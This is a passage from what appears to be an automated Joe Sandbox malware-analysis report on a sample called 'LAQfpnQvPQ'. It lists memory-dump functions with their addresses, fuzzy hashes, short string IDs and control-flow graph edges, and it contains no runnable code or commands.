                                                                          • Source File: 00000000.00000002.2244697649.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7620000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 035b3545d334af1014a6bb6921c15d196abb3dad1d12e613668f6ad73750fc3e
                                                                          • Instruction ID: 8dc52f01bf3fb9aa3c6acf61da8c238624952658f200166a56512ecc14afbb66
                                                                          • Opcode Fuzzy Hash: 035b3545d334af1014a6bb6921c15d196abb3dad1d12e613668f6ad73750fc3e
                                                                          • Instruction Fuzzy Hash: E7E1EBB0E05629CFDBA4CF6AD544B9DBBF2BF4A304F1090A9D41AA7351DB385986DF00
                                                                          Function 077F4969 Relevance: .3, Instructions: 303COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245569918.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_77f0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: cf33d27048c275c2e5f44aeea1933618935b2f7080376dee79a1c15058d70b85
                                                                          • Instruction ID: 6e25e501187d560185dc48cbf7c8aaa4ac05485aeacd8c4ea4d92eaaff4b6a7e
                                                                          • Opcode Fuzzy Hash: cf33d27048c275c2e5f44aeea1933618935b2f7080376dee79a1c15058d70b85
                                                                          • Instruction Fuzzy Hash: CAD1F5B4E01258CFEB54DFA9D944BAEBBF2FB89304F1080A9D519A7394DB349985CF40
                                                                          Function 077F4978 Relevance: .3, Instructions: 300COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245569918.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_77f0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 38e1cbc0125f7bc591f6a76f666663d9beb4d25f9f6a8269bf5757f2dabcb346
                                                                          • Instruction ID: 1192b23c8a5dfd67a3dcf46f95724c852286bb478854b8fc7d49463951a8d51e
                                                                          • Opcode Fuzzy Hash: 38e1cbc0125f7bc591f6a76f666663d9beb4d25f9f6a8269bf5757f2dabcb346
                                                                          • Instruction Fuzzy Hash: 89D104B4E01258CFDB54DFAAD944BAEBBF2FB89304F1080A9D519A7394DB349985CF40
                                                                          Function 069FA420 Relevance: .2, Instructions: 236COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2241633994.00000000069F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_69f0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f4e3294aaf6a8694e19ad481f3c95cb39c355097bc62e3258bf4ffb3a28c665a
                                                                          • Instruction ID: 323965bfa1138d7a0403e2c45fecf5ba9e96f8ff7869c1853ff6ff6a8e1db0fc
                                                                          • Opcode Fuzzy Hash: f4e3294aaf6a8694e19ad481f3c95cb39c355097bc62e3258bf4ffb3a28c665a
                                                                          • Instruction Fuzzy Hash: 55A14570E11208CFEB94DFAAD588BAEB7F2FB49300F119169D109A7690DB389D85CF40
                                                                          Function 069FA430 Relevance: .2, Instructions: 232COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2241633994.00000000069F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_69f0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 80917d55790ad1be7b9d72e77d773592a032ad50aae6e4513669a8f5489c0998
                                                                          • Instruction ID: 5e632b3057cbf27d2104ba1bd3fe21d66e30fea827d730f290dbaa18c6a90bf3
                                                                          • Opcode Fuzzy Hash: 80917d55790ad1be7b9d72e77d773592a032ad50aae6e4513669a8f5489c0998
                                                                          • Instruction Fuzzy Hash: E5A14470E16208CFEB94DFAAD588BADB7F2FB49300F119169D109A7694CB389C85CF40
                                                                          Function 069FA5DE Relevance: .2, Instructions: 223COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2241633994.00000000069F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_69f0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 13f7a078160b2b2c640aafc4e00944be3a1891f89d3dd860062e13304c61511f
                                                                          • Instruction ID: 1a06532dc252031cfb9b29944c9fc19debac36d39a7972e0d5087ac078d78d33
                                                                          • Opcode Fuzzy Hash: 13f7a078160b2b2c640aafc4e00944be3a1891f89d3dd860062e13304c61511f
                                                                          • Instruction Fuzzy Hash: D4912370E15208CFEB94DFAAD584BADBBF2FB89300F5191A9D109A7654DB389C85CF40
                                                                          Function 077F3930 Relevance: .2, Instructions: 210COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245569918.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_77f0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3a78c053ce5b9c755598a3ab94b2746491d49d9ae851adc7ceb053bffdaa042f
                                                                          • Instruction ID: 280c4f6714867b1e82177ee393b9d0b9cb91484b315f4919912514c3587da691
                                                                          • Opcode Fuzzy Hash: 3a78c053ce5b9c755598a3ab94b2746491d49d9ae851adc7ceb053bffdaa042f
                                                                          • Instruction Fuzzy Hash: 0191F5B4D06208CFDB54DFAAD6847ADBBF2FB89304F14906AD509A7351DB389986CF40
                                                                          Function 077F3940 Relevance: .2, Instructions: 203COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245569918.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_77f0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 519611cfefb220a47b9ff7fad5697b13b52b43fb0c72619c4988681e30d8fad8
                                                                          • Instruction ID: a55332cfab8f1c935aa0ce99f53bca4dc9e9d816d47c45fb5224b58d0b9f5516
                                                                          • Opcode Fuzzy Hash: 519611cfefb220a47b9ff7fad5697b13b52b43fb0c72619c4988681e30d8fad8
                                                                          • Instruction Fuzzy Hash: 579104B0D06208CFDB54DFAAD6847ADBBF2FB89344F14906AD509A7351DB389986CF40
                                                                          Function 077FC350 Relevance: .1, Instructions: 84COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245569918.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_77f0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f2e2d556fa1584382b0ac55616da78ad206eb68851b9314fd6ba37a250595def
                                                                          • Instruction ID: 5d482b7e058d2d9cc758a65b152a7b8bb5c61538f21137dc0f0f976ca0481c6f
                                                                          • Opcode Fuzzy Hash: f2e2d556fa1584382b0ac55616da78ad206eb68851b9314fd6ba37a250595def
                                                                          • Instruction Fuzzy Hash: AB31F8B0E14218CFDB58CF6AC940BADBBF6BF89340F40C56AD50AA7350DB3499858F51
                                                                          Function 077560E8 Relevance: 4.2, Strings: 3, Instructions: 483COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1415 77560e8-7756110 1418 7756112-7756159 1415->1418 1419 775615e-775616c 1415->1419 1467 77565b5-77565bc 1418->1467 1420 775616e-7756179 call 7753c10 1419->1420 1421 775617b 1419->1421 1423 775617d-7756184 1420->1423 1421->1423 1426 775626d-7756271 1423->1426 1427 775618a-775618e 1423->1427 1428 77562c7-77562d1 1426->1428 1429 7756273-7756282 call 7751e30 1426->1429 1430 7756194-7756198 1427->1430 1431 77565bd-77565e5 1427->1431 1433 77562d3-77562e2 call 77515e0 1428->1433 1434 775630a-7756330 1428->1434 1446 7756286-775628b 1429->1446 1436 77561aa-7756208 call 7753950 call 77543b8 1430->1436 1437 775619a-77561a4 1430->1437 1442 77565ec-7756616 1431->1442 1450 775661e-7756634 1433->1450 1451 77562e8-7756305 1433->1451 1463 7756332-775633b 1434->1463 1464 775633d 1434->1464 1476 775620e-7756268 1436->1476 1477 775667b-77566a5 1436->1477 1437->1436 1437->1442 1442->1450 1452 7756284 1446->1452 1453 775628d-77562c2 call 7755fb8 1446->1453 1478 775663c-7756674 1450->1478 1451->1467 1452->1446 1453->1467 1469 775633f-7756367 1463->1469 1464->1469 1482 775636d-7756386 1469->1482 1483 7756438-775643c 1469->1483 1476->1467 1493 77566a7-77566ad 1477->1493 1494 77566af-77566b5 1477->1494 1478->1477 1482->1483 1510 775638c-775639b call 7751408 1482->1510 1486 77564b6-77564c0 1483->1486 1487 775643e-7756457 1483->1487 1490 77564c2-77564cc 1486->1490 1491 775651d-7756526 1486->1491 1487->1486 1513 7756459-7756468 call 7751408 1487->1513 1508 77564d2-77564e4 1490->1508 1509 77564ce-77564d0 1490->1509 1497 775655e-77565ab 1491->1497 1498 7756528-7756556 call 7753160 call 7753180 1491->1498 1493->1494 1499 77566b6-77566f3 1493->1499 1520 77565b3 1497->1520 1498->1497 1514 77564e6-77564e8 1508->1514 1509->1514 1529 77563b3-77563c8 1510->1529 1530 775639d-77563a3 1510->1530 1537 7756480-775648b 1513->1537 1538 775646a-7756470 1513->1538 1517 7756516-775651b 1514->1517 1518 77564ea-77564ee 1514->1518 1517->1490 1517->1491 1525 77564f0-7756509 1518->1525 1526 775650c-7756511 call 7750208 1518->1526 1520->1467 1525->1526 1526->1517 1533 77563fc-7756405 1529->1533 1534 77563ca-77563f6 call 77522b0 1529->1534 1539 77563a5 1530->1539 1540 77563a7-77563a9 1530->1540 1533->1477 1544 775640b-7756432 1533->1544 1534->1478 1534->1533 1537->1477 1547 7756491-77564b4 1537->1547 1545 7756474-7756476 1538->1545 1546 7756472 1538->1546 1539->1529 1540->1529 1544->1483 1544->1510 1545->1537 1546->1537 1547->1486 1547->1513
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245020385.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7750000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Haq$Haq$Haq
                                                                          • API String ID: 0-3013282719
                                                                          • Opcode ID: 23c692af31737ea05e134de31e892e4ea79549f118e8f764275b41312b5b6d58
                                                                          • Instruction ID: 901709f35f59e417f6268e4cff6e66756585b906d1abd40d56509384d03e2bff
                                                                          • Opcode Fuzzy Hash: 23c692af31737ea05e134de31e892e4ea79549f118e8f764275b41312b5b6d58
                                                                          • Instruction Fuzzy Hash: 32127CB0A002059FCB24DFA9C494A6EB7B2FF88740F54892DD806DB765DB75EC46CB90
                                                                          Function 07757DA0 Relevance: 4.1, Strings: 3, Instructions: 370COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1559 7757da0-7757ddd 1561 7757dff-7757e15 call 7757ba8 1559->1561 1562 7757ddf-7757de2 1559->1562 1568 775818b-775819f 1561->1568 1569 7757e1b-7757e27 1561->1569 1676 7757de4 call 7758710 1562->1676 1677 7757de4 call 77586b8 1562->1677 1564 7757dea-7757dec 1564->1561 1566 7757dee-7757df6 1564->1566 1566->1561 1580 77581df-77581e8 1568->1580 1570 7757e2d-7757e30 1569->1570 1571 7757f58-7757f5f 1569->1571 1572 7757e33-7757e3c 1570->1572 1573 7757f65-7757f6e 1571->1573 1574 775808e-77580c8 call 77575b0 1571->1574 1577 7758280 1572->1577 1578 7757e42-7757e56 1572->1578 1573->1574 1579 7757f74-7758080 call 77575b0 call 7757b40 call 77575b0 1573->1579 1672 77580cb call 775a550 1574->1672 1673 77580cb call 775a540 1574->1673 1582 7758285-7758289 1577->1582 1594 7757e5c-7757ef1 call 7757ba8 * 2 call 77575b0 call 7757b40 call 7757be8 call 7757c90 call 7757cf8 1578->1594 1595 7757f48-7757f52 1578->1595 1670 7758082 1579->1670 1671 775808b 1579->1671 1583 77581ad-77581b6 1580->1583 1584 77581ea-77581f1 1580->1584 1587 7758294 1582->1587 1588 775828b 1582->1588 1583->1577 1590 77581bc-77581ce 1583->1590 1585 77581f3-7758236 call 77575b0 1584->1585 1586 775823f-7758246 1584->1586 1585->1586 1596 7758248-7758258 1586->1596 1597 775826b-775827e 1586->1597 1601 7758295 1587->1601 1588->1587 1605 77581d0-77581d5 1590->1605 1606 77581de 1590->1606 1651 7757f10-7757f43 call 7757cf8 1594->1651 1652 7757ef3-7757f0b call 7757c90 call 77575b0 call 7757860 1594->1652 1595->1571 1595->1572 1596->1597 1608 775825a-7758262 1596->1608 1597->1582 1601->1601 1674 77581d8 call 775ace1 1605->1674 1675 77581d8 call 775acf0 1605->1675 1606->1580 1608->1597 1618 77580d1-7758182 call 77575b0 1618->1568 1651->1595 1652->1651 1670->1671 1671->1574 1672->1618 1673->1618 1674->1606 1675->1606 1676->1564 1677->1564
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245020385.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7750000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4']q$4']q$4']q
                                                                          • API String ID: 0-705557208
                                                                          • Opcode ID: f246f4059dc3deea78d3dcf6154160c1acb71df7c3579b03f3e3739bbb3c443c
                                                                          • Instruction ID: 44e82782e77d42fcb7964a1630ea294248c0bd5d55239b1430f6cde87de11cf1
                                                                          • Opcode Fuzzy Hash: f246f4059dc3deea78d3dcf6154160c1acb71df7c3579b03f3e3739bbb3c443c
                                                                          • Instruction Fuzzy Hash: E1F1EB74B00218CFDB08DFA4D998A9DB7B2FF88300F158559E806AB365DB75EC42CB91
                                                                          Function 0775C780 Relevance: 4.1, Strings: 3, Instructions: 363COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1678 775c780-775c790 1680 775c796-775c79a 1678->1680 1681 775c8a9-775c8ce 1678->1681 1682 775c8d5-775c8fa 1680->1682 1683 775c7a0-775c7a9 1680->1683 1681->1682 1684 775c901-775c937 1682->1684 1683->1684 1685 775c7af-775c7d6 1683->1685 1701 775c93e-775c94e 1684->1701 1696 775c7dc-775c7de 1685->1696 1697 775c89e-775c8a8 1685->1697 1699 775c7e0-775c7e3 1696->1699 1700 775c7ff-775c801 1696->1700 1699->1701 1702 775c7e9-775c7f3 1699->1702 1703 775c804-775c808 1700->1703 1711 775c957-775c994 1701->1711 1712 775c950-775c955 1701->1712 1702->1701 1705 775c7f9-775c7fd 1702->1705 1706 775c869-775c875 1703->1706 1707 775c80a-775c819 1703->1707 1705->1700 1705->1703 1706->1701 1709 775c87b-775c898 call 7750238 1706->1709 1707->1701 1715 775c81f-775c866 call 7750238 1707->1715 1709->1696 1709->1697 1721 775c996-775c9aa 1711->1721 1722 775c9b8-775c9cf 1711->1722 1712->1711 1715->1706 1797 775c9ad call 775cff9 1721->1797 1798 775c9ad call 775ce98 1721->1798 1731 775c9d5-775cabb call 7757ba8 call 77575b0 * 2 call 7757be8 call 775b3b8 call 77575b0 call 775a550 call 7758450 1722->1731 1732 775cac0-775cad0 1722->1732 1727 775c9b3 1730 775cbe3-775cbee 1727->1730 1738 775cbf0-775cc00 1730->1738 1739 775cc1d-775cc3e call 7757cf8 1730->1739 1731->1732 1741 775cad6-775cbb0 call 7757ba8 * 2 call 7758360 call 77575b0 * 2 call 7757860 call 7757cf8 call 77575b0 1732->1741 1742 775cbbe-775cbda call 77575b0 1732->1742 1752 775cc10-775cc18 call 7758450 1738->1752 1753 775cc02-775cc08 1738->1753 1794 775cbb2 1741->1794 1795 775cbbb 1741->1795 1742->1730 1752->1739 1753->1752 1794->1795 1795->1742 1797->1727 1798->1727
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245020385.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7750000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (aq$(aq$Haq
                                                                          • API String ID: 0-2456560092
                                                                          • Opcode ID: 0a926b3169af8b09540c602bda525f161480bdba1c333135e51146ecb613e3b9
                                                                          • Instruction ID: 90b64d3817363564fca4d439f2e0cf4b0e3ff96d7c49d7b14f2569a991e66ee0
                                                                          • Opcode Fuzzy Hash: 0a926b3169af8b09540c602bda525f161480bdba1c333135e51146ecb613e3b9
                                                                          • Instruction Fuzzy Hash: 4FE15174A00209DFCB05EFA4D4949ADBBB2FF89350F148569E806AB365DF70EC42CB91
                                                                          Function 077541D1 Relevance: 4.0, Strings: 3, Instructions: 236COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1799 77541d1-77541d2 1800 77541d4-77541da 1799->1800 1801 77541db-77541e1 1799->1801 1800->1801 1802 77541e3-7754208 1800->1802 1801->1802 1804 77542f4-7754319 1802->1804 1805 775420e-7754212 1802->1805 1815 7754320-7754344 1804->1815 1806 7754214-7754220 1805->1806 1807 7754226-775422a 1805->1807 1806->1807 1806->1815 1808 7754230-7754247 1807->1808 1809 775434b-7754370 1807->1809 1820 7754249-7754255 1808->1820 1821 775425b-775425f 1808->1821 1828 7754377-77543b2 1809->1828 1815->1809 1820->1821 1820->1828 1823 7754261-775427a 1821->1823 1824 775428b-77542a4 call 7751340 1821->1824 1823->1824 1837 775427c-775427f 1823->1837 1835 77542a6-77542ca 1824->1835 1836 77542cd-77542cf 1824->1836 1845 77543b4 1828->1845 1846 77543bb-77543ca 1828->1846 1897 77542d2 call 77541d1 1836->1897 1898 77542d2 call 7754470 1836->1898 1899 77542d2 call 77543b8 1836->1899 1839 7754288 1837->1839 1839->1824 1841 77542d8-77542f1 1847 77543b6-77543b9 1845->1847 1848 775441f-7754427 1845->1848 1849 7754402-775441d 1846->1849 1850 77543cc-77543ec 1846->1850 1847->1846 1856 775442e-775446a 1848->1856 1849->1848 1850->1856 1860 77543ee-77543ff 1850->1860 1865 7754473-7754482 1856->1865 1866 775446c 1856->1866 1867 7754529-7754562 1865->1867 1868 7754488-7754494 1865->1868 1869 77544ce-77544dd 1866->1869 1870 775446e-775446f 1866->1870 1882 7754564-7754569 1867->1882 1883 775456b-7754577 1867->1883 1873 7754496-775449d 1868->1873 1874 775449e-77544a2 1868->1874 1870->1869 1876 77544a9-77544b2 1874->1876 1878 77544b4-77544d9 1876->1878 1879 7754521-7754528 1876->1879 1891 775451c-775451f 1878->1891 1892 77544db-77544f5 1878->1892 1882->1883 1885 77545a7-77545ad 1883->1885 1886 7754579-775459d 1883->1886 1888 77545bf-77545ce 1885->1888 1889 77545af-77545bc 1885->1889 1886->1885 1887 775459f 1886->1887 1887->1885 1891->1878 1891->1879 1892->1891 1894 77544f7-7754500 1892->1894 1895 7754502-7754505 1894->1895 1896 775450f-775451b 1894->1896 1895->1896 1897->1841 1898->1841 1899->1841
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245020385.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7750000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (aq$(aq$(aq
                                                                          • API String ID: 0-2593664646
                                                                          • Opcode ID: 95a617dca706a3bbb41d4c73866a1e173f1d3585db692b51a68eb8209518d3c0
                                                                          • Instruction ID: 3c6cee91dfe3a6a0f08bac8cc69ca6dd08592fdd679652c9c7b3bacfa4e24ca5
                                                                          • Opcode Fuzzy Hash: 95a617dca706a3bbb41d4c73866a1e173f1d3585db692b51a68eb8209518d3c0
                                                                          • Instruction Fuzzy Hash: A281F2713042568FCB159F28D854AAE3FA6EF85350B2484AAEC05CF3A6CF75DC46C7A1
                                                                          Function 075F1EA8 Relevance: 3.1, Strings: 2, Instructions: 577COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2244585264.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_75f0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4']q$4']q
                                                                          • API String ID: 0-3120983240
                                                                          • Opcode ID: 9d3f550ac801a5227aaf4c015b7f0f59d21cd2616e24fc3f63c5048a1df49b85
                                                                          • Instruction ID: ecabdaef1239ff72f94f785340536104e28540cf93d8bb10f4814607270518b9
                                                                          • Opcode Fuzzy Hash: 9d3f550ac801a5227aaf4c015b7f0f59d21cd2616e24fc3f63c5048a1df49b85
                                                                          • Instruction Fuzzy Hash: 0642B3F4E0020ADFCB14DFA8D598AFEBBB6FB49301F50845ADA16AB254D7385842CF51
                                                                          Function 077525FB Relevance: 3.0, Strings: 2, Instructions: 521COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245020385.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7750000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $]q$$]q
                                                                          • API String ID: 0-127220927
                                                                          • Opcode ID: 6b460d7cebb077b785914cb81c30f8392471c72df78fff908cc2da764f6f662a
                                                                          • Instruction ID: 17a2a4383af51d5aeb22fc25672c111ea59cb6a9fc3e1a66e272b19c9e7b51fe
                                                                          • Opcode Fuzzy Hash: 6b460d7cebb077b785914cb81c30f8392471c72df78fff908cc2da764f6f662a
                                                                          • Instruction Fuzzy Hash: 3F227CB4A0021A8FDB15DFA9C849AADBBF1FF48741F148515EC12A7396DB789D02CF90
                                                                          Function 075F29D0 Relevance: 2.9, Strings: 2, Instructions: 362COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2244585264.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_75f0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4']q$4']q
                                                                          • API String ID: 0-3120983240
                                                                          • Opcode ID: cedfa0c387905795b35ee6035dc18dcf785740055724c4483e6feb27e42b0c0a
                                                                          • Instruction ID: 77040cff9bbc4a23f0c03e1d3359d700bbdeab538fd5909d4bcd13e9cc9be98f
                                                                          • Opcode Fuzzy Hash: cedfa0c387905795b35ee6035dc18dcf785740055724c4483e6feb27e42b0c0a
                                                                          • Instruction Fuzzy Hash: 44F1CFB4D11209DFCB68DFA4E4986ECBBB2FF89311F20842AE916A7354DB355885CF41
                                                                          Function 07755BA0 Relevance: 2.9, Strings: 2, Instructions: 355COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245020385.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7750000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (aq$d
                                                                          • API String ID: 0-3557608343
                                                                          • Opcode ID: 5ef10a6d0da62484cd5bdf2a4f3234c0eab9c4a7536e6d9dba8a14669a2efa6f
                                                                          • Instruction ID: 4a55a62808e96ca214be938d58cd5e3c2b3542b27bfec335e588304de849ae80
                                                                          • Opcode Fuzzy Hash: 5ef10a6d0da62484cd5bdf2a4f3234c0eab9c4a7536e6d9dba8a14669a2efa6f
                                                                          • Instruction Fuzzy Hash: D6D19CB5600606CFC714CF28C48496AB7F7FF89350B69C969D85A8B365DB70F852CB90
                                                                          Function 075F26A8 Relevance: 2.7, Strings: 2, Instructions: 231COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2244585264.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_75f0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4']q$4']q
                                                                          • API String ID: 0-3120983240
                                                                          • Opcode ID: fe3c7ad6bda061e7f979a7c1ce24f634e5350706d08976770d5719984b753bfe
                                                                          • Instruction ID: 95191e789edbfd00a42436ba8ce3f450613c483be4fffcbaa5adf7dac8da86ec
                                                                          • Opcode Fuzzy Hash: fe3c7ad6bda061e7f979a7c1ce24f634e5350706d08976770d5719984b753bfe
                                                                          • Instruction Fuzzy Hash: BDA1D0B4E01209CFCB18DFA9D5986EDBBB2FF89301F50856AD912AB254CB345886CF50
                                                                          Function 0775EAD8 Relevance: 2.7, Strings: 2, Instructions: 166COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245020385.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7750000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (aq$Haq
                                                                          • API String ID: 0-3785302501
                                                                          • Opcode ID: f0b49f27e6cb7a196a10d842f07d3df262db103f37cde93c7a8235d54c58da12
                                                                          • Instruction ID: 6e53f952f956bf285e26ba8d07bd175297eebffa66677468cee47449ea7ef41c
                                                                          • Opcode Fuzzy Hash: f0b49f27e6cb7a196a10d842f07d3df262db103f37cde93c7a8235d54c58da12
                                                                          • Instruction Fuzzy Hash: 475104B17042518FC7059B38C85496E7BB2EFC6351B1581EAE906CF3A2CEB5DD02C7A2
                                                                          Function 07751C30 Relevance: 2.7, Strings: 2, Instructions: 154COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245020385.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7750000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (aq$Haq
                                                                          • API String ID: 0-3785302501
                                                                          • Opcode ID: c11d51bee0966c1f9245ab9b28f28df218c26fd494b0bafcd7eb4fe1b0d7db58
                                                                          • Instruction ID: af344d4f7b005336221bb084df25ab968ca33d23a476e1b57e7bbdf06273fbac
                                                                          • Opcode Fuzzy Hash: c11d51bee0966c1f9245ab9b28f28df218c26fd494b0bafcd7eb4fe1b0d7db58
                                                                          • Instruction Fuzzy Hash: 9A519AB47002059FC719AF39C4A896EBBB2BFD9241728446DD8078B3A4CF35EC06CB91
                                                                          Function 0775D9D1 Relevance: 2.6, Strings: 2, Instructions: 97COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245020385.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7750000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (aq$Haq
                                                                          • API String ID: 0-3785302501
                                                                          • Opcode ID: 99e397d536855549eb6c25e3fb35f2c0051e5250a4a8c7707412ebd393781d2a
